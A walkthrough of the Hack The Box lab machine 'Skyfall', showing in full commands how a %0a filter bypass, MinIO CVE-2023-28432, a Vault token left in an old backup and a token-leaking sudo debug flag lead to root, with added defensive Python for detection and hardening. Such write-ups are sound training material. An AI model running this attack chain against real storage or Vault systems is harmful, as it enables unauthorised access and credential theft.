Video version

All new walkthroughs appear first on the channel t.me/kiberdruzhinnik. Subscribe so you don't miss new ones!

Watch it at t.me/kiberdruzhinnik/161.

Service overview

Of course, we start by scanning the ports.

$ rustscan --ulimit=5000 --range=1-65535 -a 10.10.11.254 -- -A -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/user/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.254:22
Open 10.10.11.254:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -A -sC" on ip 10.10.11.254
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 18:55 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:55
Completed NSE at 18:55, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:55
Completed NSE at 18:55, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:55
Completed NSE at 18:55, 0.00s elapsed
Initiating Ping Scan at 18:55
Scanning 10.10.11.254 [2 ports]
Completed Ping Scan at 18:55, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:55
Completed Parallel DNS resolution of 1 host. at 18:55, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:55
Scanning 10.10.11.254 [2 ports]
Discovered open port 22/tcp on 10.10.11.254
Discovered open port 80/tcp on 10.10.11.254
Completed Connect Scan at 18:55, 0.05s elapsed (2 total ports)
Initiating Service scan at 18:55
Scanning 2 services on 10.10.11.254
Completed Service scan at 18:56, 6.12s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.254.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 1.75s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.22s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
Nmap scan report for 10.10.11.254
Host is up, received syn-ack (0.056s latency).
Scanned at 2024-02-04 18:55:56 EST for 8s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCVqvI8vGs8EIUAAUiRze8kfKmYh9ETTUei3zRd1wWWLRBjSm+soBLfclIUP69cNtQOa961nyt2/BOwuR35cLR4=
|   256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINk0VgEkDNZoIJwcG5LEVZDZkEeSRHLBmAOtd/pduzRW
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:56
Completed NSE at 18:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds

Web

Let's see what is on the web server.

[screenshot]

In the page source we find the address demo.skyfall.htb.

[screenshot]

We go there right away and log in as guest:guest.

[screenshot]

We see the service's control panel; the backend is written in Flask.

[screenshot]

Click MinIO Metrics:

[screenshot]

We get a 403:

[screenshot]

Let's try to bypass the filter with the %0a character: http://demo.skyfall.htb/metrics%0a

[screenshot]

From here we find the address of the MinIO cluster: http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster
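Why does a trailing newline get past the 403? The usual cause is a parser differential between the front end and the backend: the deny rule compares the decoded path for exact equality, while a regex-based router (Werkzeug, which Flask uses, is one) anchors its rules with `$`, and in Python `$` also matches just before a trailing newline. The following Python illustration is added here and is not code from the box or from this post; the route table, the deny rule and the function names are assumptions made for the illustration. It shows the naive pair side by side with a hardened pair that rejects control characters and uses `fullmatch` instead of `$`.

```python
import re
from urllib.parse import unquote

# Constructed front-end rule: deny exactly "/metrics" by string comparison,
# the way an exact-match "return 403" location behaves.
DENY_EXACT = "/metrics"

# Constructed backend route table: one Python regex per route, anchored with
# "$" the way regex-based routers do. In Python, "$" also matches right
# before a trailing "\n", which is the whole problem.
ROUTES = {"metrics": re.compile(r"^/metrics$")}


def frontend_denies(raw_path: str) -> bool:
    """Naive deny check: exact comparison of the percent-decoded path."""
    return unquote(raw_path) == DENY_EXACT


def backend_route(raw_path: str):
    """Naive router: return the route name matched by a '$'-anchored regex."""
    path = unquote(raw_path)
    for name, pattern in ROUTES.items():
        if pattern.match(path):
            return name
    return None


def is_differential(raw_path: str) -> bool:
    """True when the backend serves a route the front end meant to deny."""
    return (not frontend_denies(raw_path)) and backend_route(raw_path) == "metrics"


# Hardened variants: refuse any path carrying control characters before the
# comparison, and match routes with fullmatch so "\n" cannot satisfy the anchor.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def frontend_denies_hardened(raw_path: str) -> bool:
    path = unquote(raw_path)
    if CONTROL_CHARS.search(path):
        return True  # never forward a path containing control characters
    return path == DENY_EXACT


def backend_route_hardened(raw_path: str):
    path = unquote(raw_path)
    for name, pattern in ROUTES.items():
        if pattern.fullmatch(path):
            return name
    return None


if __name__ == "__main__":
    for p in ["/metrics", "/metrics%0a", "/metrics%0d", "/other"]:
        print(p, "denied:", frontend_denies(p), "routed to:", backend_route(p),
              "differential:", is_differential(p))
```

The `%0d` case is included to show that the behaviour is specific to `\n`: `$` does not match before a carriage return, so only the newline opens the gap. The hardened front end closes it regardless of what the backend does, which is the property you want when the two components are maintained separately.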

We will use CVE-2023-28432.

[screenshot]

Download and install the minio client: https://min.io/docs/minio/linux/reference/minio-mc.html

$ curl https://dl.min.io/client/mc/release/linux-amd64/mc \
  --create-dirs \
  -o $HOME/minio-binaries/mc
$ chmod +x $HOME/minio-binaries/mc
$ export PATH=$PATH:$HOME/minio-binaries/
$ mc alias set myminio http://prd23-s3-backend.skyfall.htb ACCESS_KEY SECRET_KEY
$ mc admin info myminio
●  minio-node1:9000
   Uptime: 8 hours 
   Version: 2023-03-13T19:46:17Z
   Network: 2/2 OK 
   Drives: 2/2 OK 
   Pool: 1

●  minio-node2:9000
   Uptime: 8 hours 
   Version: 2023-03-13T19:46:17Z
   Network: 2/2 OK 
   Drives: 2/2 OK 
   Pool: 1

Pools:
   1st, Erasure sets: 1, Drives per erasure set: 4

1.6 MiB Used, 8 Buckets, 11 Objects, 4 Versions
4 drives online, 0 drives offline
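The `Version:` line in the `mc admin info` output is what tells a defender whether this cluster is in scope for CVE-2023-28432. The Python check below is added here (not from the post or from MinIO) and assumes the range published in the advisory: cluster deployments from RELEASE.2019-12-17T23-16-33Z up to but not including RELEASE.2023-03-20T20-16-18Z, which is the release that shipped the fix. It accepts both stamp formats, the colon form printed by `mc admin info` and the dashed form used in release tags, and audits every node version found in the output.

```python
import re
from datetime import datetime

# Affected range for CVE-2023-28432 (assumption: taken from the advisory; the
# upper bound is the release containing the fix and is itself not affected).
AFFECTED_FROM = "RELEASE.2019-12-17T23-16-33Z"
FIXED_RELEASE = "RELEASE.2023-03-20T20-16-18Z"

# Matches "2023-03-13T19:46:17Z" and "2023-03-20T20-16-18Z" alike.
_STAMP = re.compile(r"(\d{4}-\d{2}-\d{2})T(\d{2})[-:](\d{2})[-:](\d{2})Z")


def parse_minio_version(text: str) -> datetime:
    """Turn a MinIO version/release stamp into a comparable datetime."""
    m = _STAMP.search(text)
    if not m:
        raise ValueError(f"no MinIO version stamp in {text!r}")
    day, hh, mm, ss = m.groups()
    return datetime.strptime(f"{day}T{hh}:{mm}:{ss}Z", "%Y-%m-%dT%H:%M:%SZ")


def is_affected_by_cve_2023_28432(version: str) -> bool:
    v = parse_minio_version(version)
    return parse_minio_version(AFFECTED_FROM) <= v < parse_minio_version(FIXED_RELEASE)


def versions_from_admin_info(output: str) -> list:
    """Extract every 'Version: ...' value from `mc admin info` output."""
    return re.findall(r"Version:\s*(\S+)", output)


def audit(output: str) -> dict:
    """Map each distinct version in the output to True when it is affected."""
    return {v: is_affected_by_cve_2023_28432(v)
            for v in sorted(set(versions_from_admin_info(output)))}


# Sample trimmed from the `mc admin info` output shown above.
SAMPLE = """\
●  minio-node1:9000
   Uptime: 8 hours
   Version: 2023-03-13T19:46:17Z
●  minio-node2:9000
   Uptime: 8 hours
   Version: 2023-03-13T19:46:17Z
"""

if __name__ == "__main__":
    for version, affected in audit(SAMPLE).items():
        print(version, "AFFECTED: upgrade past", FIXED_RELEASE if affected else "ok")
```

Both nodes here report 2023-03-13, a week before the fixed release, so the check flags the cluster. In a real environment run the same comparison against the version every node reports, since a mixed-version pool is only as safe as its oldest member.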

List all files with their versions and download the backup file:

$ mc ls --recursive --versions myminio
[2023-11-07 23:59:15 EST]     0B askyy/
[2023-11-08 00:35:28 EST]  48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf
[2023-11-09 16:37:25 EST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz
[2023-11-09 16:37:09 EST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz
[2023-11-09 16:36:30 EST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
[2023-11-07 23:58:56 EST]     0B btanner/
[2023-11-08 00:35:36 EST]  48KiB STANDARD null v1 PUT btanner/Welcome.pdf
[2023-11-07 23:58:33 EST]     0B emoneypenny/
[2023-11-08 00:35:56 EST]  48KiB STANDARD null v1 PUT emoneypenny/Welcome.pdf
[2023-11-07 23:58:22 EST]     0B gmallory/
[2023-11-08 00:36:02 EST]  48KiB STANDARD null v1 PUT gmallory/Welcome.pdf
[2023-11-07 19:08:01 EST]     0B guest/
[2023-11-07 19:08:05 EST]  48KiB STANDARD null v1 PUT guest/Welcome.pdf
[2024-02-04 11:16:25 EST] 4.8KiB STANDARD null v1 PUT guest/ph1
[2024-02-04 11:26:33 EST] 3.4KiB STANDARD null v1 PUT guest/shell.php
[2023-11-07 23:59:05 EST]     0B jbond/
[2023-11-08 00:35:45 EST]  48KiB STANDARD null v1 PUT jbond/Welcome.pdf
[2023-11-07 23:58:10 EST]     0B omansfield/
[2023-11-08 00:36:09 EST]  48KiB STANDARD null v1 PUT omansfield/Welcome.pdf
[2023-11-07 23:58:45 EST]     0B rsilva/
[2023-11-08 00:35:51 EST]  48KiB STANDARD null v1 PUT rsilva/Welcome.pdf
$ mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 myminio/askyy/home_backup.tar.gz ./home_backup.tar.gz
$ tar -xzvf home_backup.tar.gz
$ cat .bashrc
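The listing above is the defender's lesson of this step: bucket versioning kept every earlier copy of home_backup.tar.gz, and the 1.2 MiB v1 next to a 2.5 KiB v3 is a strong hint that something was removed from the archive but lives on in history. The Python audit below is added here (not from the post or from MinIO) and parses `mc ls --recursive --versions` output to report keys with retained non-current versions, flagging any older version that is at least twice the size of the current one. The threshold and the field layout of the listing are assumptions based on the output shown on this page.

```python
import re
from collections import defaultdict

# One listing line: "[timestamp] size [class versionid vN op] key".
# Prefix lines ("askyy/") have no class/version fields and are skipped.
LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<size>\S+)\s+"
    r"(?:(?P<cls>\S+)\s+(?P<vid>\S+)\s+v(?P<vnum>\d+)\s+(?P<op>\S+)\s+)?"
    r"(?P<key>\S.*)$"
)
UNITS = {"B": 1, "KiB": 1024, "MiB": 1024 ** 2, "GiB": 1024 ** 3}


def parse_size(text: str) -> int:
    """'2.5KiB' -> 2560; uses binary units the way mc prints them."""
    m = re.fullmatch(r"([\d.]+)(B|KiB|MiB|GiB)", text)
    if not m:
        raise ValueError(f"unrecognised size {text!r}")
    return int(float(m.group(1)) * UNITS[m.group(2)])


def parse_listing(output: str) -> list:
    """Return one dict per object version found in the listing."""
    objects = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE.match(line)
        if not m or m.group("vnum") is None:
            continue  # blank or prefix line, no version to record
        objects.append({
            "key": m.group("key"),
            "vid": m.group("vid"),
            "vnum": int(m.group("vnum")),
            "size": parse_size(m.group("size")),
        })
    return objects


def versions_by_key(objects: list) -> dict:
    """Group versions per key, newest (highest vN) first."""
    grouped = defaultdict(list)
    for obj in objects:
        grouped[obj["key"]].append(obj)
    for versions in grouped.values():
        versions.sort(key=lambda o: o["vnum"], reverse=True)
    return dict(grouped)


def retained_history(output: str, ratio: float = 2.0) -> dict:
    """Keys with more than one version; older versions >= ratio * current size are flagged."""
    findings = {}
    for key, versions in versions_by_key(parse_listing(output)).items():
        if len(versions) < 2:
            continue
        current = max(versions[0]["size"], 1)
        bigger = [v["vid"] for v in versions[1:] if v["size"] >= ratio * current]
        findings[key] = {"versions": len(versions), "suspicious_older": bigger}
    return findings


# Sample lines copied from the listing above.
SAMPLE_LISTING = """\
[2023-11-07 23:59:15 EST]     0B askyy/
[2023-11-08 00:35:28 EST]  48KiB STANDARD bba1fcc2-331d-41d4-845b-0887152f19ec v1 PUT askyy/Welcome.pdf
[2023-11-09 16:37:25 EST] 2.5KiB STANDARD 25835695-5e73-4c13-82f7-30fd2da2cf61 v3 PUT askyy/home_backup.tar.gz
[2023-11-09 16:37:09 EST] 2.6KiB STANDARD 2b75346d-2a47-4203-ab09-3c9f878466b8 v2 PUT askyy/home_backup.tar.gz
[2023-11-09 16:36:30 EST] 1.2MiB STANDARD 3c498578-8dfe-43b7-b679-32a3fe42018f v1 PUT askyy/home_backup.tar.gz
[2023-11-07 19:08:01 EST]     0B guest/
[2023-11-07 19:08:05 EST]  48KiB STANDARD null v1 PUT guest/Welcome.pdf
"""

if __name__ == "__main__":
    for key, info in retained_history(SAMPLE_LISTING).items():
        print(key, info)
```

On this sample the only finding is askyy/home_backup.tar.gz with three versions, and v1 is flagged. The fix on the storage side is a lifecycle rule that expires non-current versions (or an explicit purge of the old version IDs) after rotating whatever the old archive contained; reuploading a cleaned file on its own removes nothing.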

The .bashrc file contains the address and the token for Vault:

[screenshot]

Connect to Vault, look at the SSH roles, and issue ourselves an OTP for SSH:

$ wget https://releases.hashicorp.com/vault/1.15.5/vault_1.15.5_linux_amd64.zip
$ unzip vault_1.15.5_linux_amd64.zip
$ export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
$ ./vault login
TOKEN
$ ./vault token capabilities ssh/roles
list
$ ./vault list ssh/roles
Keys
----
admin_otp_key_role
dev_otp_key_role
otp_key_role
$ ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no [email protected]

[screenshot]

Instead of a password we use the OTP shown above.

User flag

[screenshot]

Privilege escalation

We can run /root/vault/vault-unseal -c /etc/vault-unseal.yaml as a privileged user:

askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User askyy may run the following commands on skyfall:
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]*
    (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml

Enable debug mode, which leaks the master token:

$ rm -rf debug.log
$ touch debug.log
$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vd
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
$ cat debug.log
2024/02/04 18:50:28 Initializing logger...
2024/02/04 18:50:28 Reading: /etc/vault-unseal.yaml
2024/02/04 18:50:28 Security Risk!
2024/02/04 18:50:28 Master token found in config: TOKEN
2024/02/04 18:50:28 Found Vault node: http://prd23-vault-internal.skyfall.htb
2024/02/04 18:50:28 Check interval: 5s
2024/02/04 18:50:28 Max checks: 5
2024/02/04 18:50:28 Establishing connection to Vault...
2024/02/04 18:50:28 Successfully connected to Vault: http://prd23-vault-internal.skyfall.htb
2024/02/04 18:50:28 Checking seal status
2024/02/04 18:50:28 Vault sealed: false
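The root cause here is a debug flag that writes the master token into a log file in the current directory, reachable by the unprivileged user who is allowed to run the tool with `sudo`. Two defensive pieces belong together: redaction at the logger so a verbose mode can never emit a token, and a scan of existing logs to find where one already did. The Python illustration below is added here and is not code from vault-unseal (which is a Go program) or from the post; the token shapes it recognises (`hvs.`/`hvb.` for current Vault service tokens, `s.`/`b.` for legacy ones) and the constructed token value are assumptions.

```python
import logging
import re
from io import StringIO

# Vault token shapes (assumption): current service/batch tokens start with
# "hvs." / "hvb.", legacy ones with "s." / "b.", followed by a long opaque body.
TOKEN_RE = re.compile(r"\b(?:hv[sb]|[sb])\.[A-Za-z0-9_-]{20,}\b")


def redact(text: str) -> str:
    """Replace the body of any token-shaped value, keeping only its prefix."""
    return TOKEN_RE.sub(lambda m: m.group(0).split(".", 1)[0] + ".[REDACTED]", text)


class RedactingFormatter(logging.Formatter):
    """Formatter that redacts after the message and its args are rendered."""

    def format(self, record: logging.LogRecord) -> str:
        return redact(super().format(record))


def write_debug_log(events: list, redacting: bool = True) -> str:
    """Render events through a logger into a string, the way a debug.log would be written."""
    buf = StringIO()
    handler = logging.StreamHandler(buf)
    fmt = "%(asctime)s %(message)s"
    handler.setFormatter(RedactingFormatter(fmt) if redacting else logging.Formatter(fmt))
    logger = logging.Logger("unseal-demo")  # standalone logger: no global handler state
    logger.addHandler(handler)
    for event in events:
        logger.info(event)
    handler.flush()
    return buf.getvalue()


def scan_log(text: str) -> list:
    """Detection side: 1-based line numbers in an existing log that carry a token."""
    return [n for n, line in enumerate(text.splitlines(), start=1) if TOKEN_RE.search(line)]


# Constructed token and events, mirroring the message shapes seen in debug.log above.
SAMPLE_TOKEN = "hvs.CONSTRUCTEDexampleTokenValue1234"
CONSTRUCTED_EVENTS = [
    "Initializing logger...",
    "Reading: /etc/vault-unseal.yaml",
    "Security Risk!",
    f"Master token found in config: {SAMPLE_TOKEN}",
    "Found Vault node: http://prd23-vault-internal.skyfall.htb",
]

if __name__ == "__main__":
    leaky = write_debug_log(CONSTRUCTED_EVENTS, redacting=False)
    print("lines leaking a token:", scan_log(leaky))
    print(write_debug_log(CONSTRUCTED_EVENTS))
```

Redacting in the formatter rather than at each call site means a new verbose message added later cannot reintroduce the leak. The scan is what you run over leftover debug.log files (and over any log shipping pipeline) to decide which tokens need to be revoked.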

In the same way, connect as root:

export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb"
./vault login
TOKEN
./vault ssh -role admin_otp_key_role -mode OTP -strict-host-key-checking=no [email protected]

[screenshot]

As before, enter the OTP code.

Root flag

[screenshot]